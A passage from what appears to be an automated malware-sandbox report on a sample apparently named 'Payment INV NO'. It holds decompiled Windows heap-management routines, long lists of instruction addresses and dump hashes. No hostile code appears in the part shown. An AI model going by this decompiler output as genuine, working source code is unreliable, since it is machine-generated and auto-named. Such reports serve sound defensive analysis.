									_t742 =  *_t748 ^ _t817 ^  *0x188874c ^ _t800;
									__eflags = _t742;
									if(_t742 != 0) {
										_t670 = 0;
									} else {
										_t672 = _t748 - (_t742 >> 0xd);
										__eflags = _t672;
										_t670 =  *_t672;
									}
									_t666 =  *((intOrPtr*)(_t670 + 0x14));
								}
								_t736 =  *(_t748 + (_t666 & 0xffff) * 8 - 4);
							} else {
								_t736 = _t734 & 0x3f;
							}
						}
					}
					_t819 = _t691 * 8 - _t736;
					_v52 = _t819;
					_t693 = _v32 & 0xc003ffff;
					_v32 = _v32 & 0xc003ffff;
					_v8 = 0;
					_t652 = E017B4620(_t736, _t800, _v32 & 0xc003ffff, _a8);
					_v56 = _t652;
					_v8 = 0xfffffffe;
					if(_t652 != 0) {
						_t738 = _a8;
						if(_t738 < _t819) {
							_t819 = _t738;
						}
						E017DF720(_t652, _a4, _t819);
						E017B77F0(_t800, _t693, _a4);
					}
					_t654 =  *( *[fs:0x30] + 0x50);
					if(_t654 != 0) {
						__eflags =  *_t654;
						if( *_t654 == 0) {
							goto L16;
						}
						_t655 =  *( *[fs:0x30] + 0x50) + 0x226;
						goto L17;
					} else {
						L16:
						_t655 = 0x7ffe0380;
						L17:
						if( *_t655 != 0) {
							_t656 =  *[fs:0x30];
							__eflags =  *(_t656 + 0x240) & 0x00000001;
							if(( *(_t656 + 0x240) & 0x00000001) == 0) {
								goto L18;
							}
							_t809 = _v56;
							__eflags = _t809;
							if(_t809 != 0) {
								__eflags = _v32 & 0x00800000;
								if((_v32 & 0x00800000) == 0) {
									L018516CF(_t800, _t809, _a4, _v52, _a8, 2);
								}
							}
							L19:
							_t477 = _t809;
							goto L20;
						}
						L18:
						_t809 = _v56;
						goto L19;
					}
				}
			}































































































































































                                                          0x017b8f80
                                                          0x017b8f85
                                                          0x017b8f87
                                                          0x017b8f8c
                                                          0x017b8f97
                                                          0x017b8f98
                                                          0x017b8fa1
                                                          0x017b8fa6
                                                          0x017b8fab
                                                          0x017b8faf
                                                          0x017b8fb5
                                                          0x017b8fb8
                                                          0x017b8fba
                                                          0x017b8fbd
                                                          0x017b8fbf
                                                          0x017b8fc2
                                                          0x017b8fc5
                                                          0x017b8fcc
                                                          0x017b8fd0
                                                          0x017b8fde
                                                          0x01800c9a
                                                          0x01800cb2
                                                          0x01800cb5
                                                          0x01800cb5
                                                          0x017b90f5
                                                          0x017b90f8
                                                          0x017b9106
                                                          0x017b9106
                                                          0x017b8fe7
                                                          0x017b8fea
                                                          0x017b8ff0
                                                          0x01800cc3
                                                          0x01800cc3
                                                          0x017b8ff6
                                                          0x017b9000
                                                          0x017b9109
                                                          0x017b910b
                                                          0x01800da6
                                                          0x01800db3
                                                          0x01800db8
                                                          0x00000000
                                                          0x01800db8
                                                          0x017b9114
                                                          0x017b9116
                                                          0x017b9119
                                                          0x017b911f
                                                          0x01800dbf
                                                          0x01800dc5
                                                          0x00000000
                                                          0x00000000
                                                          0x01800dcb
                                                          0x01800dce
                                                          0x01800dd1
                                                          0x00000000
                                                          0x01800dd1
                                                          0x017b9125
                                                          0x017b9125
                                                          0x017b9128
                                                          0x017b912d
                                                          0x01800de1
                                                          0x01800dfc
                                                          0x01800dff
                                                          0x00000000
                                                          0x01800dff
                                                          0x017b9133
                                                          0x017b9135
                                                          0x017b9722
                                                          0x017b913b
                                                          0x017b913b
                                                          0x017b913b
                                                          0x017b9145
                                                          0x017b914b
                                                          0x017b914e
                                                          0x01800e06
                                                          0x01800e06
                                                          0x017b9154
                                                          0x017b9157
                                                          0x017b915e
                                                          0x017b9165
                                                          0x017b9169
                                                          0x017b91af
                                                          0x017b91af
                                                          0x017b91b6
                                                          0x017b91ba
                                                          0x01800e4a
                                                          0x01800e4a
                                                          0x017b91c0
                                                          0x017b91c2
                                                          0x017b91c5
                                                          0x017b91c9
                                                          0x017b91ce
                                                          0x017b91d8
                                                          0x017b91db
                                                          0x01800e51
                                                          0x01800e56
                                                          0x01800e5b
                                                          0x01800e5b
                                                          0x017b91db
                                                          0x017b91e1
                                                          0x017b91e4
                                                          0x017b91e7
                                                          0x017b91f0
                                                          0x017b91f0
                                                          0x017b91f3
                                                          0x017b91f5
                                                          0x017b91fb
                                                          0x017b91fb
                                                          0x017b91fb
                                                          0x017b91fb
                                                          0x017b954a
                                                          0x017b954c
                                                          0x017b954f
                                                          0x017b9551
                                                          0x017b9554
                                                          0x017b95c5
                                                          0x017b95c8
                                                          0x00000000
                                                          0x017b95c8
                                                          0x017b9556
                                                          0x017b9556
                                                          0x017b91fc
                                                          0x017b91fe
                                                          0x017b95ad
                                                          0x017b95b0
                                                          0x017b9776
                                                          0x017b9778
                                                          0x00000000
                                                          0x00000000
                                                          0x017b977e
                                                          0x017b95b6
                                                          0x017b921d
                                                          0x017b921d
                                                          0x017b9224
                                                          0x017b9563
                                                          0x017b9563
                                                          0x017b9241
                                                          0x017b9241
                                                          0x017b9241
                                                          0x017b9244
                                                          0x017b9247
                                                          0x017b9249
                                                          0x017b924c
                                                          0x017b924f
                                                          0x017b9254
                                                          0x01800e70
                                                          0x01800e7a
                                                          0x01800e81
                                                          0x01800e91
                                                          0x017b955e
                                                          0x017b955e
                                                          0x017b9502
                                                          0x017b9502
                                                          0x00000000
                                                          0x017b9502
                                                          0x017b925a
                                                          0x017b925d
                                                          0x01800e99
                                                          0x01800e99
                                                          0x01800e9c
                                                          0x01800ea0
                                                          0x01800ebb
                                                          0x01800ebe
                                                          0x01800ea2
                                                          0x01800ea2
                                                          0x01800ea4
                                                          0x01800ea7
                                                          0x01800eaa
                                                          0x01800eac
                                                          0x01800eac
                                                          0x01800eac
                                                          0x01800eaf
                                                          0x01800eaf
                                                          0x01800eb2
                                                          0x01800eb6
                                                          0x01800eb6
                                                          0x01800ec8
                                                          0x01800eca
                                                          0x01800ed2
                                                          0x01800ed5
                                                          0x01800edb
                                                          0x01800ede
                                                          0x01800ee1
                                                          0x01800eef
                                                          0x017b953f
                                                          0x017b953f
                                                          0x017b9542
                                                          0x017b92eb
                                                          0x017b92ee
                                                          0x017b92f1
                                                          0x017b92f3
                                                          0x017b92f6
                                                          0x017b92f8
                                                          0x017b945e
                                                          0x017b9461
                                                          0x017b9463
                                                          0x017b9716
                                                          0x017b9719
                                                          0x017b9469
                                                          0x017b9469
                                                          0x017b9469
                                                          0x017b946e
                                                          0x017b9471
                                                          0x01800f94
                                                          0x00000000
                                                          0x017b9477
                                                          0x017b9477
                                                          0x017b947b
                                                          0x017b9577
                                                          0x017b957a
                                                          0x017b957e
                                                          0x017b9581
                                                          0x017b9586
                                                          0x017b958b
                                                          0x017b9594
                                                          0x017b9597
                                                          0x017b959d
                                                          0x017b95a2
                                                          0x017b949b
                                                          0x017b949b
                                                          0x017b94a1
                                                          0x017b94a4
                                                          0x017b94a4
                                                          0x017b94a7
                                                          0x017b94a7
                                                          0x017b94aa
                                                          0x017b94ad
                                                          0x017b94af
                                                          0x017b94d1
                                                          0x017b94d1
                                                          0x017b94d5
                                                          0x01801055
                                                          0x0180105d
                                                          0x0180105d
                                                          0x017b94db
                                                          0x017b94de
                                                          0x017b94e1
                                                          0x017b968e
                                                          0x017b9697
                                                          0x017b969a
                                                          0x0180106a
                                                          0x01801073
                                                          0x01801076
                                                          0x0180107c
                                                          0x01801081
                                                          0x01801097
                                                          0x01801097
                                                          0x0180109b
                                                          0x018010a1
                                                          0x018010ac
                                                          0x018010bb
                                                          0x018010c0
                                                          0x018010c6
                                                          0x018010c8
                                                          0x0180114b
                                                          0x0180114e
                                                          0x018010ca
                                                          0x018010ca
                                                          0x018010d0
                                                          0x018010d4
                                                          0x018010f5
                                                          0x018010fa
                                                          0x018010d6
                                                          0x018010eb
                                                          0x018010f0
                                                          0x01801102
                                                          0x01801108
                                                          0x01801113
                                                          0x0180111b
                                                          0x01801121
                                                          0x01801125
                                                          0x01801127
                                                          0x0180112e
                                                          0x01801138
                                                          0x01801139
                                                          0x01801139
                                                          0x01801140
                                                          0x01801140
                                                          0x017b96a0
                                                          0x017b96a6
                                                          0x017b96a8
                                                          0x017b96ab
                                                          0x017b96b1
                                                          0x017b96b4
                                                          0x017b96b8
                                                          0x01801156
                                                          0x017b96be
                                                          0x017b96be
                                                          0x017b96be
                                                          0x017b96c2
                                                          0x017b96c5
                                                          0x017b96c7
                                                          0x017b972c
                                                          0x017b96c9
                                                          0x017b96dd
                                                          0x017b96dd
                                                          0x017b96dd
                                                          0x017b96df
                                                          0x017b96f8
                                                          0x017b96f8
                                                          0x017b96fd
                                                          0x017b96fd
                                                          0x017b94e7
                                                          0x017b94eb
                                                          0x017b94f0
                                                          0x017b94f3
                                                          0x017b94f6
                                                          0x017b94f9
                                                          0x0180115f
                                                          0x01801163
                                                          0x017b94ff
                                                          0x017b94ff
                                                          0x017b94ff
                                                          0x017b94f9
                                                          0x00000000
                                                          0x017b94eb
                                                          0x017b94b1
                                                          0x017b94b5
                                                          0x017b9705
                                                          0x017b9709
                                                          0x00000000
                                                          0x00000000
                                                          0x01800ff7
                                                          0x01800ff7
                                                          0x01800ffa
                                                          0x01801000
                                                          0x01801007
                                                          0x01801009
                                                          0x0180100b
                                                          0x01801011
                                                          0x01801011
                                                          0x01801014
                                                          0x01801017
                                                          0x0180101a
                                                          0x0180101d
                                                          0x0180101f
                                                          0x01801022
                                                          0x01801028
                                                          0x0180102b
                                                          0x01801033
                                                          0x01801033
                                                          0x01801036
                                                          0x00000000
                                                          0x00000000
                                                          0x0180104b
                                                          0x017b94ce
                                                          0x017b94ce
                                                          0x017b94ce
                                                          0x00000000
                                                          0x01801022
                                                          0x017b94c3
                                                          0x017b94c6
                                                          0x017b94cb
                                                          0x00000000
                                                          0x017b94cb
                                                          0x01800f9c
                                                          0x01800fa8
                                                          0x01800fb0
                                                          0x01800fba
                                                          0x01800fbe
                                                          0x00000000
                                                          0x01800fbe
                                                          0x017b9487
                                                          0x017b948a
                                                          0x017b9490
                                                          0x017b9495
                                                          0x01800fc6
                                                          0x01800fcc
                                                          0x01800fdc
                                                          0x01800fe6
                                                          0x01800fec
                                                          0x00000000
                                                          0x01800fec
                                                          0x00000000
                                                          0x017b9495
                                                          0x017b9471
                                                          0x017b9301
                                                          0x017b9304
                                                          0x017b931b
                                                          0x017b931b
                                                          0x017b931f
                                                          0x0180116c
                                                          0x00000000
                                                          0x0180116c
                                                          0x017b9328
                                                          0x017b932e
                                                          0x017b9331
                                                          0x017b9331
                                                          0x017b9334
                                                          0x017b9336
                                                          0x017b9338
                                                          0x017b95cf
                                                          0x017b95d5
                                                          0x017b95e7
                                                          0x017b95e9
                                                          0x017b95ec
                                                          0x017b95f3
                                                          0x017b95f5
                                                          0x017b95fa
                                                          0x017b95fd
                                                          0x017b9601
                                                          0x017b9604
                                                          0x01801178
                                                          0x01801183
                                                          0x01801183
                                                          0x01801178
                                                          0x017b960a
                                                          0x017b933e
                                                          0x017b9344
                                                          0x017b9347
                                                          0x017b934d
                                                          0x017b9350
                                                          0x017b9355
                                                          0x018011b9
                                                          0x018011bc
                                                          0x018011bf
                                                          0x018011c1
                                                          0x018011c7
                                                          0x018011d2
                                                          0x018011d2
                                                          0x018011c1
                                                          0x017b9355
                                                          0x017b935b
                                                          0x017b935e
                                                          0x017b935e
                                                          0x017b9361
                                                          0x017b9364
                                                          0x017b9367
                                                          0x017b9370
                                                          0x017b9373
                                                          0x017b9376
                                                          0x017b9376
                                                          0x017b9376
                                                          0x017b9378
                                                          0x017b937f
                                                          0x017b9392
                                                          0x017b9394
                                                          0x017b9397
                                                          0x017b939e
                                                          0x017b93a0
                                                          0x017b93a6
                                                          0x017b93a6
                                                          0x017b93a9
                                                          0x017b93ac
                                                          0x017b93b0
                                                          0x01801217
                                                          0x01801219
                                                          0x01801219
                                                          0x017b93b6
                                                          0x017b93bf
                                                          0x017b93c2
                                                          0x017b93c4
                                                          0x017b93c7
                                                          0x017b93d3
                                                          0x017b93d6
                                                          0x017b93d9
                                                          0x01801221
                                                          0x01801226
                                                          0x0180122b
                                                          0x0180122e
                                                          0x0180122e
                                                          0x017b93d9
                                                          0x017b93df
                                                          0x017b93e2
                                                          0x017b93e6
                                                          0x017b9616
                                                          0x017b961b
                                                          0x017b9621
                                                          0x017b9624
                                                          0x017b9626
                                                          0x017b9629
                                                          0x017b9631
                                                          0x017b9633
                                                          0x017b9636
                                                          0x01801236
                                                          0x0180123b
                                                          0x01801240
                                                          0x01801243
                                                          0x01801243
                                                          0x017b9636
                                                          0x017b963c
                                                          0x017b9643
                                                          0x017b9647
                                                          0x0180124d
                                                          0x0180124f
                                                          0x017b964d
                                                          0x017b964f
                                                          0x017b9654
                                                          0x017b965d
                                                          0x017b965d
                                                          0x017b9660
                                                          0x017b9667
                                                          0x017b966a
                                                          0x017b966e
                                                          0x017b967c
                                                          0x017b967f
                                                          0x017b9682
                                                          0x017b9682
                                                          0x017b966e
                                                          0x017b93ef
                                                          0x017b93f2
                                                          0x017b93fc
                                                          0x017b93ff
                                                          0x017b9402
                                                          0x017b9402
                                                          0x017b9402
                                                          0x017b9404
                                                          0x017b940b
                                                          0x017b940f
                                                          0x017b9411
                                                          0x017b9417
                                                          0x017b941c
                                                          0x017b9420
                                                          0x017b9420
                                                          0x017b9420
                                                          0x017b9424
                                                          0x017b9424
                                                          0x017b9427
                                                          0x017b942a
                                                          0x017b942d
                                                          0x017b942f
                                                          0x017b942f
                                                          0x017b9438
                                                          0x017b9445
                                                          0x017b944a
                                                          0x017b944a
                                                          0x017b9450
                                                          0x017b9456
                                                          0x00000000
                                                          0x017b9456
                                                          0x017b930e
                                                          0x017b9313
                                                          0x017b9315
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b9315
                                                          0x017b9263
                                                          0x017b9266
                                                          0x017b9269
                                                          0x017b926c
                                                          0x017b926f
                                                          0x01800efb
                                                          0x01800eff
                                                          0x017b9275
                                                          0x017b9275
                                                          0x017b9278
                                                          0x01800f0c
                                                          0x017b927e
                                                          0x017b9282
                                                          0x017b9284
                                                          0x01800f15
                                                          0x01800f17
                                                          0x01800f50
                                                          0x01800f54
                                                          0x01800f75
                                                          0x01800f78
                                                          0x01800f56
                                                          0x01800f56
                                                          0x01800f58
                                                          0x01800f5b
                                                          0x01800f5e
                                                          0x01800f60
                                                          0x01800f60
                                                          0x01800f60
                                                          0x01800f63
                                                          0x01800f63
                                                          0x01800f66
                                                          0x01800f6a
                                                          0x01800f6d
                                                          0x01800f70
                                                          0x01800f70
                                                          0x01800f7c
                                                          0x01800f7f
                                                          0x01800f19
                                                          0x01800f26
                                                          0x01800f28
                                                          0x01800f2b
                                                          0x01800f34
                                                          0x01800f34
                                                          0x01800f36
                                                          0x01800f2d
                                                          0x01800f2d
                                                          0x01800f2d
                                                          0x01800f3c
                                                          0x01800f3f
                                                          0x01800f45
                                                          0x01800f48
                                                          0x01800f4b
                                                          0x01800f4b
                                                          0x01800f85
                                                          0x017b928a
                                                          0x017b928d
                                                          0x017b928d
                                                          0x017b928d
                                                          0x017b9284
                                                          0x017b9278
                                                          0x017b9290
                                                          0x017b929c
                                                          0x017b929f
                                                          0x017b92a6
                                                          0x017b92a8
                                                          0x00000000
                                                          0x017b92aa
                                                          0x017b92b2
                                                          0x017b92c0
                                                          0x017b92c2
                                                          0x017b92c5
                                                          0x017b92c7
                                                          0x017b953c
                                                          0x00000000
                                                          0x017b92cd
                                                          0x017b92d0
                                                          0x017b92d6
                                                          0x017b92d9
                                                          0x017b92dc
                                                          0x017b92df
                                                          0x017b92e2
                                                          0x017b92e4
                                                          0x017b92e4
                                                          0x017b92e5
                                                          0x017b92e5
                                                          0x017b92e8
                                                          0x00000000
                                                          0x017b92e8
                                                          0x017b92c7
                                                          0x017b92a8
                                                          0x017b922a
                                                          0x017b9231
                                                          0x00000000
                                                          0x00000000
                                                          0x017b9237
                                                          0x017b923b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b923b
                                                          0x017b9204
                                                          0x017b9204
                                                          0x017b9207
                                                          0x017b920b
                                                          0x01800e63
                                                          0x01800e63
                                                          0x017b9217
                                                          0x00000000
                                                          0x017b916b
                                                          0x017b916b
                                                          0x017b9171
                                                          0x017b917b
                                                          0x017b9180
                                                          0x017b9733
                                                          0x017b9736
                                                          0x017b976e
                                                          0x00000000
                                                          0x017b976e
                                                          0x017b9738
                                                          0x017b9742
                                                          0x017b9749
                                                          0x01800e10
                                                          0x01800e1a
                                                          0x01800e24
                                                          0x01800e2b
                                                          0x01800e3b
                                                          0x018012f0
                                                          0x017b9509
                                                          0x017b9509
                                                          0x017b9510
                                                          0x017b951b
                                                          0x017b951e
                                                          0x017b9520
                                                          0x01801303
                                                          0x01801306
                                                          0x00000000
                                                          0x00000000
                                                          0x01801315
                                                          0x017b952b
                                                          0x017b952b
                                                          0x017b952e
                                                          0x0180131f
                                                          0x01801325
                                                          0x0180132c
                                                          0x00000000
                                                          0x00000000
                                                          0x01801332
                                                          0x01801335
                                                          0x01801337
                                                          0x0180133d
                                                          0x01801344
                                                          0x0180135c
                                                          0x0180135c
                                                          0x01801344
                                                          0x00000000
                                                          0x01801337
                                                          0x017b9534
                                                          0x017b9534
                                                          0x00000000
                                                          0x017b9534
                                                          0x017b9526
                                                          0x017b9526
                                                          0x00000000
                                                          0x017b9526
                                                          0x017b9755
                                                          0x017b9761
                                                          0x017b9766
                                                          0x00000000
                                                          0x017b9186
                                                          0x017b9189
                                                          0x017b918c
                                                          0x017b9193
                                                          0x017b9193
                                                          0x017b919d
                                                          0x017b919d
                                                          0x017b919d
                                                          0x017b91a3
                                                          0x017b91a3
                                                          0x017b91a7
                                                          0x017b91ab
                                                          0x017b91ab
                                                          0x017b91ab
                                                          0x00000000
                                                          0x017b91ab
                                                          0x017b9180
                                                          0x017b901d
                                                          0x017b9020
                                                          0x00000000
                                                          0x00000000
                                                          0x017b9028
                                                          0x017b9035
                                                          0x017b903c
                                                          0x01800cca
                                                          0x017b9042
                                                          0x017b9049
                                                          0x017b9049
                                                          0x017b904f
                                                          0x017b9052
                                                          0x017b9058
                                                          0x01800cd9
                                                          0x017b905e
                                                          0x017b9061
                                                          0x01800ce6
                                                          0x017b9067
                                                          0x017b906d
                                                          0x017b9783
                                                          0x017b9785
                                                          0x01800cf0
                                                          0x01800cf4
                                                          0x01800d08
                                                          0x01800cf6
                                                          0x01800cf6
                                                          0x01800cf8
                                                          0x01800cfb
                                                          0x01800cfd
                                                          0x01800cfd
                                                          0x01800cfd
                                                          0x01800d00
                                                          0x01800d00
                                                          0x017b978b
                                                          0x017b9795
                                                          0x017b9797
                                                          0x017b979a
                                                          0x017b97e9
                                                          0x017b979c
                                                          0x017b97a1
                                                          0x017b97a1
                                                          0x017b97a3
                                                          0x017b97a3
                                                          0x017b97a5
                                                          0x017b97a5
                                                          0x017b97af
                                                          0x017b9073
                                                          0x017b9076
                                                          0x017b9076
                                                          0x017b906d
                                                          0x017b9061
                                                          0x017b9080
                                                          0x017b9082
                                                          0x017b9088
                                                          0x017b908e
                                                          0x017b9091
                                                          0x017b909d
                                                          0x017b90a2
                                                          0x017b90a5
                                                          0x017b90ae
                                                          0x017b90b0
                                                          0x017b90b5
                                                          0x017b956c
                                                          0x017b956c
                                                          0x017b90c1
                                                          0x017b90cc
                                                          0x017b90cc
                                                          0x017b90d7
                                                          0x017b90dc
                                                          0x01800d46
                                                          0x01800d49
                                                          0x00000000
                                                          0x00000000
                                                          0x01800d58
                                                          0x00000000
                                                          0x017b90e2
                                                          0x017b90e2
                                                          0x017b90e2
                                                          0x017b90e7
                                                          0x017b90ea
                                                          0x01800d62
                                                          0x01800d68
                                                          0x01800d6f
                                                          0x00000000
                                                          0x00000000
                                                          0x01800d75
                                                          0x01800d78
                                                          0x01800d7a
                                                          0x01800d80
                                                          0x01800d87
                                                          0x01800d9c
                                                          0x01800d9c
                                                          0x01800d87
                                                          0x017b90f3
                                                          0x017b90f3
                                                          0x00000000
                                                          0x017b90f3
                                                          0x017b90f0
                                                          0x017b90f0
                                                          0x00000000
                                                          0x017b90f0
                                                          0x017b90dc

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: d80111c8f4f24d383150fe2479c62593f19bccbd04d48d30162f140460e20ad7
                                                          • Instruction ID: 9f6b30c2dcda339390036aa1ee60e67b28df42192b9595440202ba81bbf1e580
                                                          • Opcode Fuzzy Hash: d80111c8f4f24d383150fe2479c62593f19bccbd04d48d30162f140460e20ad7
                                                          • Instruction Fuzzy Hash: A492AEB0904649DFDB26CF68C884BEEFBF1BF09318F148099E665AB292D7349945CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BA309 Relevance: 3.2, Strings: 2, Instructions: 687COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E017BA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1888a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E017BA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E017BDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E01799373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0179A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1888748 - 1;
						if( *0x1888748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0179B150();
								} else {
									E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(0x178d350);
								E0179B150();
								__eflags =  *0x1887bc8;
								if( *0x1887bc8 == 0) {
									__eflags = 1;
									L01852073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
